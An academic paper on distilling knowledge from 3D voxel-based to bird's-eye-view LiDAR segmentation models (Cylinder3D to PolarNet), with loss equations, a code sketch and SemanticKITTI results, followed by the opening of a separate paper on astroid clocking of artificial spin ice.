# Knowledge Distillation from 3D to Bird's-Eye-View for LiDAR Semantic Segmentation ###### Abstract LiDAR point cloud segmentation is one of the most fundamental tasks for autonomous driving scene understanding. However, it is difficult for existing models to achieve both high inference speed and accuracy simultaneously. For example, voxel-based methods perform well in accuracy, while Bird's-Eye-View (BEV)-based methods can achieve real-time inference. To overcome this issue, we develop an effective 3D-to-BEV knowledge distillation method that transfers rich knowledge from 3D voxel-based models to BEV-based models. Our framework mainly consists of two modules: the voxel-to-pillar distillation module and the label-weight distillation module. Voxel-to-pillar distillation distills sparse 3D features to BEV features for middle layers to make the BEV-based model aware of more structural and geometric information. Label-weight distillation helps the model pay more attention to regions with more height information. Finally, we conduct experiments on the SemanticKITTI dataset and Paris-Lille-3D. The results on SemanticKITTI show more than 5% improvement on the test set, especially for classes such as motorcycle and person, with more than 15% improvement. The code can be accessed at [https://github.com/fengjiang5/Knowledge-Distillation-from-Cylinder3D-to-PolarNet](https://github.com/fengjiang5/Knowledge-Distillation-from-Cylinder3D-to-PolarNet). Scene understanding, point clouds, knowledge distillation, semantic segmentation ## I Introduction The 3D point clouds can effectively capture the real-world scene while preserving geometric and structural information to the greatest extent. Point cloud semantic segmentation plays a very important role in the perception of the surrounding environment, especially in autonomous driving, which aims to predict a label for each point in the current scan [1]. Therefore, balancing speed and accuracy is especially important. Currently, deep learning-based LiDAR segmentation methods can be generally categorized as point-based [2, 3, 4], projection-based [5, 6, 7, 8] and voxel-based [9, 10]. For instance, PointNet [2] is a point-based method that only uses a stack of MLPs to learn the representations of raw point clouds directly. Projection-based methods can be further divided into two categories: range-based methods that use spherical projection [6, 8] and Bird's-Eye-View (BEV)-based methods [5]. After point cloud projection, these methods can take full advantage of traditional 2D convolutional neural networks. The inference speed of these methods is very fast and can meet the requirements of real-time [11], but the precision of these models is not satisfactory. In contrast, voxel-based methods [9, 10] can achieve high accuracy but are difficult to apply in practice due to the use of time-consuming and computationally expensive sparse operators [12]. Geoffrey Hinton proposed knowledge distillation [13], which is usually used for model compression. It trains the simple student model by using the outputs of the teacher model as a supervisory signal. Currently, many methods used for point cloud segmentation apply knowledge distillation for model compression [10] or better feature extraction [14]. However, few methods focus on knowledge distillation between two different point cloud segmentation methods. Therefore, the trade-off between high accuracy and high inference speed is a pivotal problem for practical applications, such as autonomous driving. 
To address this issue, we propose a novel framework to improve the accuracy of BEV-based models while maintaining their real-time inference speed. We develop voxel-to-pillar distillation and label-weight distillation modules for knowledge distillation. Specifically, voxel-to-pillar distillation is an attention-based method for middle feature distillation that utilizes cross-attention mechanisms and MSE loss to help BEV-based models learn more structural and spatial geometric information from voxel-based models. Label-weight distillation is used for the last layer before classification, which selects regions with relatively large values in the height count map for distillation since these regions are the main reason for the performance gap. We evaluate our model on the SemanticKITTI dataset [1] and Paris-Lille-3D [15], and it outperforms the original Polar Net [5] by 5% mIoU on the test set of SemanticKITTI. We also conduct ablation studies to demonstrate the effect of the distillation modules. The results show that our framework can largely improve the segmentation performance of PolarNet, especially the performance for classes that have more height information, such as motorcycles and persons whose heights along the z-axis are compressed under the Bird's-Eye-View. The main contributions of our work are threefold: * We propose an effective knowledge distillation framework that transfers knowledge from 3D voxel-based to BEV-based models for LiDAR point cloud segmentation. * We develop a novel voxel-to-pillar distillation module that helps BEV-based models learn more deep structural and spatial geometric information. Moreover, to reduce the height information loss, we design a label-weight distillation module focusing more on key regions with rich height information. * We conduct experiments on the SemanticKITTI dataset. The results show that our framework can outperform the original by 5% mIoU on the test set, especially in classes such as motorcycle and person, with more than 15% improvement. We also conduct experiments on Paris-Lille-3D, and the results demonstrate our method's effectiveness and generalization power. ## II Related Work ### _LiDAR Segmentation_ Currently, LiDAR point cloud segmentation methods [5, 6, 7, 9, 16, 17], which are crucial for autonomous driving scene understanding, can be mainly separated into three categories: point-based, projection-based and voxel-based. Point-based methods, such as PointNet [2] and KPConv [3], consume raw point clouds as input without any voxelization or other intermediate representations, which is straightforward. However, these methods are computationally intensive due to a large number of laser points. To overcome this problem, methods based on range view (RV) and bird's-eye-view (BEV) first project 3D points into 2D space and then feed the projected maps into a 2D convolution network for feature extraction. For instance, PolarNet [5] quantizes the points into polar BEV grids and uses ring CNNs for downstream segmentation tasks, which improves accuracy while maintaining real-time inference speed. However, projection-based methods will inevitably lose considerable geometric information due to dimension compression. Cylinder3D [9], a classic voxel-based method, proposes to use a cylindrical partition and an asymmetrical 3D sparse module to retain 3D representation and tackle the issues induced by the point cloud's sparsity and unevenness of distribution at the same time. 
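As a side note, the projection step underlying such BEV representations can be sketched in a few lines. The grid bounds and resolutions below are arbitrary placeholders rather than the settings used by PolarNet or Cylinder3D; the snippet only illustrates how points are binned into polar pillars.

```python
import numpy as np

# Schematic polar (BEV) quantization of a LiDAR scan: each point (x, y, z, i)
# is assigned to a (rho, phi) pillar. Bounds/resolution are placeholders.
def polar_pillar_indices(points, rho_max=50.0, n_rho=480, n_phi=360):
    x, y = points[:, 0], points[:, 1]
    rho = np.sqrt(x**2 + y**2)
    phi = np.arctan2(y, x)                                        # [-pi, pi)
    rho_idx = np.clip((rho / rho_max * n_rho).astype(int), 0, n_rho - 1)
    phi_idx = ((phi + np.pi) / (2 * np.pi) * n_phi).astype(int) % n_phi
    return rho_idx, phi_idx

# Example: five random points with (x, y, z, intensity)
pts = np.random.randn(5, 4) * np.array([10.0, 10.0, 1.0, 0.1])
print(polar_pillar_indices(pts))
```

A cylindrical partition as in Cylinder3D additionally bins the \(z\) coordinate instead of collapsing it, which is precisely the height information that BEV pillars give up.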
Although voxel-based methods have the ability to achieve high accuracy, they demand a huge amount of memory usage and computing resources. Therefore, they are difficult to use in real-world applications such as real vehicle deployment. To reach high precision and decrease inference time, we propose a novel knowledge distillation framework to help BEV-based models learn more geometric and structural information. ### _Knowledge Distillation_ Knowledge distillation, first proposed by Geoffrey Hinton in [13], is a generic model compression architecture that transfers the outstanding learning representation capability of cumbersome and large models to small but easily deployable models. In addition, it can also be used for auxiliary supervision when training the model [14, 18]. Wu _et al._[18] proposed ADD, an attention-based depth knowledge distillation framework with a 3D-aware positional encoding that uses an extra lidar branch to capture depth information. They used cross-attention to improve training from the lidar branch to the main branch, and the results showed that this is better than the simple use of MSE loss. Hou [10] claimed that their Point-to-Voxel Knowledge Distillation (PVKD) is the first work that applied knowledge distillation for LiDAR semantic segmentation. In their work, they proposed a supervoxel partition method to divide the point clouds into several supervoxels and designed a difficulty-aware sampling strategy to more frequently sample supervoxels containing less-frequent classes and faraway objects. Yan [14] proposed a 2D priors assisted semantic segmentation method to boost the representation learning on point clouds. They have achieved good results but are still limited by speed because of sparse operators. The previous methods rarely involved knowledge distillation from voxel-based methods to BEV-based methods. Our proposed framework can solve this problem well, especially for classes where much information is lost during projection, such as motorcycles and persons. ## III Method Given a certain scan of point clouds \(\mathbf{P}\in\mathbb{R}^{N\times 4}\), the objective of semantic segmentation is to predict a label for each point, where \(N\) is the number of points. Each point contains (\(x,y,z,i\)), where \((x,y,z)\) are the Cartesian coordinates relative to the LiDAR scanner and \(i\) is the reflection intensity. Fig. 1: The overview of our framework consists of three main parts: the teacher model, the student model and the knowledge distillation model. During training, we use pretrained weights for the teacher model and update the parameters of the student model and knowledge distillation model. Voxel-to-pillar distillation (VPD) is used for general middle layers, and label-weight distillation (LWD) is specifically used for the layer before classification. We propose a novel framework that can transfer knowledge from accurate voxel-based methods to efficient BEV-based methods through knowledge distillation. Specifically, we propose two general modules for knowledge distillation from 3D sparse features to BEV features to reduce the gap between these two methods. First, the point clouds independently pass through the voxel-based methods and the BEV-based methods. Then voxel-to-pillar distillation and label-weight distillation are used for certain layers to help the BEV-based methods learn more geometric and structural information. The details of the proposed framework are as follows. ### _Framework Overview_ The architecture of our framework is shown in Fig. 1. 
Our framework has three main parts, similar to other knowledge distillation methods [10, 14, 18]. The first is the teacher model, and here, we choose voxel-based methods as our teacher model, which have high accuracy but suffer from a computational burden. Voxel-based methods usually encode each voxel and have more geometric and structural features. We choose BEV-based methods as the student model because they are usually efficient for practical application. The last part is the knowledge distillation model, which is the main part of our framework. Benefiting from our well-designed voxel-to-pillar distillation module and label-weight distillation module, the student model can learn more valuable information during training and improve the inference performance without extra computation. In addition, we also used logit distillation similar to others [10, 13]. ### _Voxel-to-Pillar Distillation_ Voxel-to-pillar distillation is one of our framework's main modules of knowledge distillation, as illustrated in Fig. 2. Generally, voxel-based methods use sparse operators [12] because the point clouds are sparse and unevenly distributed. To maintain the sparsity of the point clouds and reduce the computational cost, most sparse operators make the features of intermediate layers still sparse, making voxel-based methods slow and hard to align directly with BEV-based methods. BEV-based methods take pillars as pseudo images, so they can directly use efficient CNNs designed for image processing, but the information is lost at the data preprocessing stage. Our proposed module helps BEV-based methods overcome this problem to some extent. The feature of voxel-based methods is denoted as \(F^{i}_{V}\), and the corresponding BEV-based feature is denoted as \(F^{i}_{B}\), where \(i\) means the \(i\)-th layer and \(F^{i}_{B}\in\mathbb{R}^{N\times C_{V}},F^{i}_{V}\in\mathbb{R}^{N\times C_{B}}\). For simplicity, here, we assume that \(F^{i}_{V}\) and \(F^{i}_{B}\) have the same size in the \(x\)-\(y\) plane. First, we use sparse convolution to compress the features of voxel-based methods \(F^{i}_{V}\) in the z-axis and denote it as \(F^{i}_{VC}\), where \(F^{i}_{VC}=f(F^{i}_{V})\) and \(f:\mathbb{R}^{N\times C_{V}}\rightarrow\mathbb{R}^{N\times C_{B}}\). Since \(F^{i}_{VC}\) is sparse, we need to obtain the coordinates of non-empty voxels, which are used to match the features of BEV-based methods exactly. Second, we flatten features from voxel-based methods and BEV-based methods, which are denoted as \(f^{i}_{V}\) and \(f^{i}_{B}\). \(f^{i}_{V}\) and \(f^{i}_{B}\) are from different methods, so they are in different domain spaces and usually have different distributions. To solve this problem, we use the domain transfer method learned from BYOL [19], specifically two MLPs with normalization. Specifically, \[\begin{split} f^{i}_{V}=&\text{MLP}(F(C(F^{i}_{V}))) \\ f^{i}_{B}=& F(F^{i}_{B}),\end{split} \tag{1}\] where MLP means domain transfer, \(F\) means flattening of the features and \(C\) means compression of the shape of the features. Then, we produce the Key from \(f^{i}_{B}\) and obtain the Query and Value from \(f^{i}_{V}\) by MLPs. We integrate these in a cross-attention module by \[Attention(Q,K,V)=\text{softmax}(\frac{QK^{T}}{\sqrt{d_{k}}})V \tag{2}\] such as [18] to generate student features \(f^{i}_{B^{\prime}}\) and use MSE loss between \(f^{i}_{B^{\prime}}\) and \(f^{i}_{V}\) to make the student methods learn the lost information during data preprocessing. 
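For concreteness, the following PyTorch-style sketch shows one possible realization of this module. The projection sizes, the single-head attention, and the assumption that teacher and student features have already been gathered at the same non-empty BEV positions are simplifications for illustration, not the authors' released implementation (see the linked repository for that); the normalized form of the loss is given in Eq. (3) below.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class VoxelToPillarDistill(nn.Module):
    """Sketch of Eqs. (1)-(3): domain-transfer MLP + cross-attention + normalized MSE."""
    def __init__(self, c_teacher, c_student, d=128):
        super().__init__()
        # Domain transfer for the height-compressed, flattened teacher features, Eq. (1).
        self.teacher_proj = nn.Sequential(nn.Linear(c_teacher, d), nn.LayerNorm(d),
                                          nn.ReLU(), nn.Linear(d, d))
        self.q = nn.Linear(d, d)           # Query from teacher features
        self.k = nn.Linear(c_student, d)   # Key from student (BEV) features
        self.v = nn.Linear(d, d)           # Value from teacher features
        self.attn = nn.MultiheadAttention(embed_dim=d, num_heads=1, batch_first=True)

    def forward(self, f_teacher, f_student):
        # f_teacher: (N, c_teacher) sparse teacher features at non-empty positions
        #            (typically detached from the teacher backbone);
        # f_student: (N, c_student) BEV features gathered at the same (x, y) positions.
        f_v = self.teacher_proj(f_teacher).unsqueeze(0)        # (1, N, d)
        f_b = f_student.unsqueeze(0)                           # (1, N, c_student)
        f_b_prime, _ = self.attn(self.q(f_v), self.k(f_b), self.v(f_v))   # Eq. (2)
        # Normalized MSE between f_B' and the projected teacher features, cf. Eq. (3).
        return F.mse_loss(F.normalize(f_b_prime.squeeze(0), dim=-1),
                          F.normalize(f_v.squeeze(0), dim=-1))
```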
We normalize the features \(f^{i}_{B^{\prime}}\) and \(f^{i}_{V}\) produced by the BYOL-style projection [19], which means that we focus more on directional differences than on numerical differences. Therefore, the voxel-to-pillar distillation loss is given as follows: \[\mathcal{L}_{VPD}\left(f_{B^{\prime}},f_{V}\right)=\frac{1}{|\mathcal{I}|}\sum_{i\in\mathcal{I}}\frac{1}{N_{i}}\left\|\frac{f^{i}_{B^{\prime}}}{\left\|f^{i}_{B^{\prime}}\right\|_{2}}-\frac{f^{i}_{V}}{\left\|f^{i}_{V}\right\|_{2}}\right\|_{2}^{2} \tag{3}\] where \(N_{i}\) is the number of nonempty voxels and \(\mathcal{I}\) is the subset of layers used for distillation.

Fig. 2: Illustration of the voxel-to-pillar distillation (VPD) module. We flatten the 3D sparse features of the teacher model and use MLPs to transfer the domain to match the corresponding features of the student model. Then, we use a cross-attention module between the 3D sparse features and the BEV features to reinforce the learning capabilities of the student model.

### _Label-Weight Distillation_

Label-weight distillation is used for the last layer before classification. One of the main reasons for the performance degradation of BEV-based methods is that they lose considerable height information, which plays an important role, especially for hard labels and hard scenes; Fig. 4 in Sec. IV-E illustrates this point. When we project the points onto the \(x\)-\(y\) plane, there may be only \(4\sim 6\) pillars belonging to the class person, and the class road will mislead the model because the proportion of points on the road surface is large, even though these pillars belong to the class person. We cannot use voxel-to-pillar distillation directly, because it relies on global information in the middle layers, so we propose label-weight distillation, which focuses on the key regions. The last layer is more sensitive to height loss than the middle layers, so we use a height embedding to better preserve the height information. Fig. 3 shows the details of label-weight distillation. Because we want the model to focus on some key regions and the last layer always has a large size, selecting some regions for distillation is necessary. We divide the whole scene into \(K\) regions. According to the above analysis, we design a method that selects regions with more non-empty voxels along the z-axis. Specifically, we count a height map \(H\) for the sparse voxel features, whose value at each position is the number of nonempty voxels at that position. Then, we calculate a weight for each region according to its ground-truth labels. The weight and the probability of selecting the \(i\)-th region are defined as \(W_{i}=H_{i}/\text{sum}(H)\), \(P_{i}=W_{i}/\text{sum}(W)\), where \(i\in\{1\cdots K\}\); regions with no height information are never selected. Our proposed method is well suited for distillation from voxel-based methods to BEV-based methods, especially when height information is lost. Specifically, we first add the height embedding \(F_{h}\) to the features from the voxel-based method \(f_{V}\), which enables the model to encode deeper high-level information. We use two sparse convolution layers on \(f_{V}\) after height encoding to compress the 3D features and, at the same time, transfer the domain to match the features of the BEV-based method. Then, we select \(M\) regions for the features from the BEV-based method \(f_{B}\) and the compressed features \(f_{V^{\prime}}\) (a sketch of this selective sampling follows below). Finally, we flatten the features and use the MSE loss between \(f_{B}\) and \(f_{V^{\prime}}\) with weights derived from the labels.
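The selective sampling just described can be sketched as a small NumPy routine. The partition of the scene into regions is passed in as masks because the exact partitioning scheme is not fixed here; the function name and interface are illustrative assumptions, not the authors' code.

```python
import numpy as np


def sample_lwd_regions(height_map, region_masks, M, rng=None):
    """Sketch of the selective sampling used for label-weight distillation.

    height_map:   (H, W) array, number of non-empty voxels along z per BEV cell.
    region_masks: list of K boolean (H, W) masks partitioning the scene.
    Returns indices of M regions sampled with probability P_i = W_i / sum(W),
    where W_i = H_i / sum(H); regions with no height information are skipped."""
    rng = rng or np.random.default_rng(0)
    h = np.array([height_map[m].sum() for m in region_masks], dtype=np.float64)
    keep = np.flatnonzero(h > 0)              # never select empty regions
    w = h[keep] / h.sum()                     # W_i = H_i / sum(H)
    p = w / w.sum()                           # P_i = W_i / sum(W)
    picked = rng.choice(keep, size=min(M, keep.size), replace=False, p=p)
    return picked.tolist()
```

The returned region indices would then be used to crop the corresponding teacher and student feature patches before applying the weighted loss of Eq. (4) below.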
The label-weight distillation loss is given as follows: \[\mathcal{L}_{LWD}\left(f_{B},f_{V^{\prime}}\right)=\frac{1}{\sum_{j=1}^{M}N_{j}}\sum_{j=1}^{M}\left\|\frac{f_{B}^{j}}{\left\|f_{B}^{j}\right\|_{2}}-\frac{f_{V^{\prime}}^{j}}{\left\|f_{V^{\prime}}^{j}\right\|_{2}}\right\|_{2}^{2} \tag{4}\] where \(j\) indexes the \(j\)-th selected region and \(N_{j}\) is the number of nonempty voxels in that region.

### _Loss Function_

Our loss function combines the original segmentation losses of the BEV-based method, \(\mathcal{L}_{\text{wce}}\) and \(\mathcal{L}_{\text{lovasz}}\), with three distillation terms: the voxel-to-pillar distillation loss \(\mathcal{L}_{\text{VPD}}\), the label-weight distillation loss \(\mathcal{L}_{\text{LWD}}\), and the logit distillation loss \(\mathcal{L}_{\text{Logit}}\). \(\mathcal{L}_{\text{wce}}\) denotes the weighted cross-entropy loss, whose class weights are set according to the reciprocal proportions of the different categories of points in the whole training set. Assume that there are \(C\) classes, \(x\) is the input, \(y\) is the target, \(w=[w_{0},w_{1},\cdots,w_{C-1}]\) is the class weight, and \(N\) is the number of points in the current batch. Then \[\mathcal{L}_{\text{wce}}=-\sum_{n=1}^{N}\frac{w_{y_{n}}}{\sum_{m=1}^{N}w_{y_{m}}}\log\frac{\exp\left(x_{n,y_{n}}\right)}{\sum_{c=1}^{C}\exp\left(x_{n,c}\right)}. \tag{5}\] \(\mathcal{L}_{\text{lovasz}}\), proposed by [20], directly optimizes the intersection-over-union (IoU) score. Given the labels \(y\) and the predictions \(x\), the IoU of class \(c\) is defined as \[J_{c}\left(y,x\right)=\frac{\left|\left\{y=c\right\}\cap\left\{x=c\right\}\right|}{\left|\left\{y=c\right\}\cup\left\{x=c\right\}\right|}, \tag{6}\] \[\mathcal{L}_{\text{lovasz}}=1-J_{c}\left(y,x\right). \tag{7}\] \(\mathcal{L}_{\text{Logit}}\) is applied to the predicted class probabilities, as in [13]. Thus, we obtain the final loss as \[\begin{split}\mathcal{L}=&\mathcal{L}_{\text{wce}}+\mathcal{L}_{\text{lovasz}}+\beta_{1}\mathcal{L}_{\text{VPD}}\left(f_{B^{\prime}},f_{V}\right)\\ &+\beta_{2}\mathcal{L}_{\text{LWD}}\left(f_{B},f_{V^{\prime}}\right)+\beta_{3}\mathcal{L}_{\text{Logit}},\end{split} \tag{8}\] where \(\beta_{1},\beta_{2},\beta_{3}\) are the balance coefficients.

## IV Experiment

### _Datasets and Metrics_

SemanticKITTI [1] is a large dataset for LiDAR point cloud semantic segmentation which provides annotations for all points. It has 22 point cloud sequences, each collected from a different scene. As recommended, we use sequences 00 to 10 for training, sequence 08 for validation during training, and sequences 11 to 21 for testing. We use the mean intersection-over-union (mIoU) over all classes as the evaluation metric, defined as \(mIoU=\frac{1}{n}\sum_{c=1}^{n}\frac{TP_{c}}{TP_{c}+FP_{c}+FN_{c}}\), where \(TP_{c}\), \(FP_{c}\) and \(FN_{c}\) denote the numbers of true positive, false positive and false negative points for class \(c\); the mIoU is thus the per-class IoU averaged over all classes.

### _Implementation Details_

We use Cylinder3D [9] as an example of voxel-based methods and PolarNet [5] as the BEV-based method. Cylinder3D uses a cylindrical partition and a sparse convolutional network, while PolarNet first projects the point clouds to BEVs and uses ring convolutions designed for BEV-based methods. They share a similar pipeline of data preprocessing, point feature extraction with PointNet [2], and encoder and decoder modules. We use the original model structures and parameters of Cylinder3D [9] and PolarNet [5].
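For reference, the weighted cross-entropy term of Eq. (5) and the combination of Eq. (8) can be written as a short PyTorch sketch. The function names are illustrative rather than the authors' code, and the default balance coefficients follow the values \(2,2,1\) listed in the next paragraph.

```python
import torch
import torch.nn.functional as F


def weighted_cross_entropy(logits, targets, class_weights):
    """Eq. (5): per-point cross-entropy weighted by w_{y_n} (inverse class
    frequency), normalized by the total weight of the points in the batch.
    logits: (N, C) raw scores, targets: (N,) int64 labels, class_weights: (C,)."""
    log_probs = F.log_softmax(logits, dim=1)
    w = class_weights[targets]                                    # w_{y_n}
    nll = -log_probs.gather(1, targets.unsqueeze(1)).squeeze(1)   # -log p_{y_n}
    return (w * nll).sum() / w.sum()


def total_loss(l_wce, l_lovasz, l_vpd, l_lwd, l_logit, betas=(2.0, 2.0, 1.0)):
    """Eq. (8): segmentation losses plus the three weighted distillation terms."""
    b1, b2, b3 = betas
    return l_wce + l_lovasz + b1 * l_vpd + b2 * l_lwd + b3 * l_logit
```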
Here, we list our main settings and the parameters used in knowledge distillation. We select the 2nd and 3rd layers in the encoder and decoder for voxel-to-pillar distillation and the last layer for label-weight distillation. We divide the whole scene into 24 regions and set \(M\) to 2 for the selective sampling in label-weight distillation. For the other parameters, we set the batch size to 2 and use Adam [22] with a learning rate of 0.001 for optimization. We train our model for 40 epochs. The loss-balance coefficients \(\beta_{1},\beta_{2},\beta_{3}\) are \(2,2,1\).

Fig. 3: Illustration of the label-weight distillation (LWD) module. We combine height embeddings with the original teacher features and choose features at the corresponding locations using the proposed selective sampling. Finally, we apply an MSE loss with label-generated weights between the selected features from the teacher and the student models.

### _Results_

The results on the SemanticKITTI dataset [1] are shown in Tab. I. We compare different methods on the test set, including point-based methods such as KPConv [3] and RandLa-Net [4] and projection-based methods such as RangeNet [6], SqueezeSegV2 [7] and SalsaNext [8]. The last group comprises our teacher model Cylinder3D [9], the original PolarNet [5], and PolarNet trained with our framework. It can be seen that our model surpasses the baseline by 5% mIoU. In Sec. III, we argue that the loss of height information is the main reason why BEV-based methods perform worse than voxel-based methods. The experiments also show that some classes, such as motorcycle, truck, and person, exhibit a large gap between Cylinder3D and PolarNet. Our proposed method mainly targets the height information lost during projection, through voxel-to-pillar distillation and label-weight distillation, and from the experiments we can see that the classes with richer height information show clear gains over the baseline. We also conduct experiments on Paris-Lille-3D [15]. The results, shown in Tab. II, demonstrate our method's effectiveness and generalization power. We further test different kinds of sparse operators, such as scatter-max and sparse convolution, for changing the resolution of the features, and find that sparse convolution is more appropriate for compressing the 3D sparse features to the BEV plane. Domain transfer and cross-attention further improve the performance of our model.

### _Visualization_

Fig. 4 shows a visual comparison between Cylinder3D, PolarNet, and our method. The error counts of the different methods differ most at locations with obvious height changes or rich semantic information. Fig. 4(a) and Fig. 4(b) show the point clouds and the ground truth, and Fig. 4(c) shows the number of non-empty voxels at each location, where a darker color indicates a greater height change. Fig. 4(d), Fig. 4(e) and Fig. 4(f) show the error counts at each location for Cylinder3D [9], PolarNet [5] and our method. As shown in the red circles, our method can predict objects such as buildings and trucks as correctly as Cylinder3D, whereas PolarNet often makes incorrect predictions in these cases.

## V Conclusions

In this paper, we propose a general knowledge distillation framework from voxel-based models to BEV-based models for point cloud semantic segmentation. Voxel-to-pillar distillation distills sparse 3D features into 2D BEV features for the middle layers and makes the BEV-based model learn more structural and geometric knowledge.
Label-weight distillation is used for the last layer before classification, which helps the model pay more attention to regions with more height information. Experiments on the SemanticKITTI dataset and Paris-Lille-3D demonstrate that our method can outperform the baseline by 5% mIoU on the test set, especially for classes such as motorcycle and person, with more than 15% improvement.
2306.07388
Clocked dynamics in artificial spin ice
Artificial spin ice (ASI) are nanomagnetic metamaterials exhibiting a wide range of emergent properties, which have recently shown promise for neuromorphic computing. However, the lack of efficient protocols to control the state evolution of these metamaterials has been limiting progress. To overcome this barrier, we introduce astroid clocking, a global field protocol offering discrete, gradual evolution of spin states. The method exploits the intrinsic switching astroids and dipolar interactions of the nanomagnets to selectively address ASI spins in sequence. We demonstrate, experimentally and in simulations, how astroid clocking of pinwheel ASI allows ferromagnetic domains to be gradually grown or reversed at will. More complex dynamics arise when the clock protocol allows both growth and reversal to occur simultaneously. Astroid clocking offers unprecedented control and understanding of ASI dynamics in both time and space, extending what is possible in nanomagnetic metamaterials.
Johannes H. Jensen, Anders Strømberg, Ida Breivik, Arthur Penty, Michael Foerster, Miguel Angel Niño, Muhammad Waqas Khaliq, Gunnar Tufte, Erik Folven
2023-06-12T19:35:04Z
http://arxiv.org/abs/2306.07388v2
# Clocked dynamics in artificial spin ice ###### Abstract Artificial spin ice (ASI) are nanomagnetic metamaterials exhibiting a wide range of emergent properties, which have recently shown promise for neuromorphic computing. However, the lack of efficient protocols to control the state evolution of these metamaterials has been limiting progress. To overcome this barrier, we introduce _astroid clocking_, a global field protocol offering discrete, gradual evolution of spin states. The method exploits the intrinsic switching astroids and dipolar interactions of the nanomagnets to selectively address ASI spins in sequence. We demonstrate, experimentally and in simulations, how astroid clocking of pinwheel ASI allows ferromagnetic domains to be gradually grown or reversed at will. More complex dynamics arise when the clock protocol allows both growth and reversal to occur simultaneously. Astroid clocking offers unprecedented control and understanding of ASI dynamics in both time and space, extending what is possible in nanomagnetic metamaterials. **Keywords: Artificial Spin Ice, Magnetic Metamaterial, Pinwheel Artificial Spin Ice, Permalloy, Nanofabrication, Nanomagnets, Coupled Nanomagnetic Ensembles, Astroid Clocking, Unconventional Computation, Material computation, flatspin** ## 1 Controlling artificial spin ice Artificial spin ice (ASI) are systems of coupled nanomagnets arranged on a two-dimensional lattice. The nanomagnets are elongated, giving them two stable magnetization directions, thus behaving as artificial spins. Dipolar interactions give rise to a rich variety of emergent behavior, as determined by the ASI geometry[1, 2, 3]. As this behavior can be probed directly, ASIs have attracted considerable interest as model systems for the study of fundamental physics[4, 5]. More recently, ASIs have shown promise as substrates for computation[6, 7, 8, 9, 10, 11, 12]. External fields are the primary method used to perturb ASIs in a controlled manner. Various global field protocols have been employed. For example, a cycled in-plane field is often used to characterize magnetization reversal[13, 14, 15, 16, 17, 18, 19, 20, 21]. Another approach is to use a rotating field with slowly decreasing amplitude to effectively anneal the ASI to a low energy state[22, 23, 24, 25, 26, 27, 28, 29]. While there are variations of these simple field protocols, more complex protocols are largely unexplored. These approaches use field strength to modulate ASI behavior, which will typically result in uncontrolled avalanches of activity[30]. An in-plane field will advance ASI state primarily when the strength of the field is increased beyond the coercivity of the array, and is highly dependent on field resolution[25, 29, 19]. Consequently, the discrete spin flip dynamics in the ASI are sudden and hard to control. Here, we introduce a new field protocol scheme called _astroid clocking_, which produces fundamentally different spin flip dynamics. Astroid clocking of an ASI results in a step-wise, gradual evolution of spin states. This offers unprecedented control and understanding of the dynamical process in both time and space. By exploiting the shape and orientation of the nanomagnet switching astroids and their dipolar coupling, specific field angles are employed to selectively address different parts of the ensemble. A clock protocol pulses fields at these angles in an alternate fashion, driving the intrinsic dynamics of the ASI. Distinctively, the clock pulses maintain a constant field amplitude. 
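As a concrete picture of what such a protocol looks like, the short sketch below expands a clock-protocol string into a sequence of constant-amplitude in-plane field pulses. The ±22° clock axes, the pulse labels, and the 62 mT unipolar amplitude follow the definitions given in Section 2 and Methods below; the data layout itself is only an illustrative assumption, not part of any published flatspin interface.

```python
import numpy as np

# Positive pulses A/B lie along the +22 and -22 degree clock axes; the
# lower-case pulses a/b are the same axes with the field direction reversed.
CLOCK_ANGLE_DEG = {"A": 22.0, "a": 202.0, "B": -22.0, "b": 158.0}


def protocol_to_pulses(protocol, H, cycles=1):
    """Expand a protocol string such as 'AB', 'ab' or 'aAbB' into a list of
    in-plane field vectors (h_x, h_y), one per clock pulse, all of magnitude H."""
    pulses = []
    for _ in range(cycles):
        for label in protocol:
            theta = np.deg2rad(CLOCK_ANGLE_DEG[label])
            pulses.append((H * np.cos(theta), H * np.sin(theta)))
    return pulses


# Example: three AB growth cycles followed by one ab reversal cycle at 62 mT.
fields = protocol_to_pulses("AB", H=0.062, cycles=3) + protocol_to_pulses("ab", H=0.062)
```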
In the context of nanomagnetic logic, Nomura et al. [31] demonstrated how the shape of two overlapping Stoner-Wohlfarth astroids can be exploited to preferentially switch nanomagnets in a 1D shift register. Astroid clocking extends and generalizes this concept to 2D nanomagnet arrays and non-elliptical nanomagnets with different astroid shapes. We show how astroid clocking reveals the intrinsic dynamics of coupled nanomagnetic systems. For this study we consider the pinwheel ASI system, but stress that astroid clocking is readily applicable to other coupled nanomagnetic systems as well. We demonstrate and analyse how ferromagnetic domains in pinwheel ASI can be gradually grown and reversed at will using astroid clocking. Different clock protocols are explored, giving rise to distinct properties of the spin flip dynamics. ## 2 Astroid clocking Pinwheel ASI[2, 19, 32] consists of nanomagnets arranged on two interleaved square sublattices, as shown in Fig. 1a. In this study, the magnets in the two sublattices \(L_{a}\) and \(L_{b}\) are rotated \(+45^{\circ}\) and \(-45^{\circ}\) with respect to the array edges. The sublattice and magnetization of the magnets are indicated by their color: magnets in sublattice \(L_{a}\) are orange or blue, while magnets in sublattice \(L_{b}\) are pink or green. For brevity, we will refer to magnet state by these four colors. Pinwheel ASI favors a ferromagnetic ordering, with emergent domains of coherent magnetization. Fig. 1a shows the four possible domain directions: rightwards (orange/pink), leftwards (blue/green) and so on. The ferromagnetic domains are separated by domain walls, which are slightly less energetically favorable[32]. The switching threshold of a nanomagnet depends on the field angle, and can be approximated by the Stoner-Wohlfarth astroid. Fig. 1b shows the switching astroids for the two orientations of stadium-shaped magnets in pinwheel ASI[33]. A magnet will switch state if the total field acting on it lies outside the astroid boundary, _and_ the field is directed against the current magnetization. Nanomagnet shape largely determines the shape of the astroid. Stadium-shaped nanomagnets, commonly used in ASI, have a switching astroid with 2-fold rotational symmetry[33]. This is in contrast to classical Stoner-Wohlfarth astroids that display 4-fold rotational symmetry derived for elliptical nanomagnets[34]. Switching astroids that break the 4-fold rotational symmetry, can be exploited to selectively address nanomagnets that are rotated 90deg with respect to each other. If the total field lies within the shaded regions in Fig. 1b, _only_ the nanomagnets in the corresponding sublattice will be able to switch. A field in the orange/blue shaded regions will address only the magnets in sublattice \(L_{a}\), while a field in the pink/green Figure 1: Astroid clocking of pinwheel ASI. **a**, a small \(4\times 4\) pinwheel ASI, formed by two interleaved sublattices \(L_{a}\) (solid outline) and \(L_{b}\) (dashed outline) with magnets oriented at \(+45\)° and \(-45\)°, respectively. Colors correspond to magnetization direction as indicated by the white center arrows. The magnetic state shows the four possible ferromagnetic domains of pinwheel ASI, where the net magnetization forms a counter-clockwise magnetic flux closure pattern. 
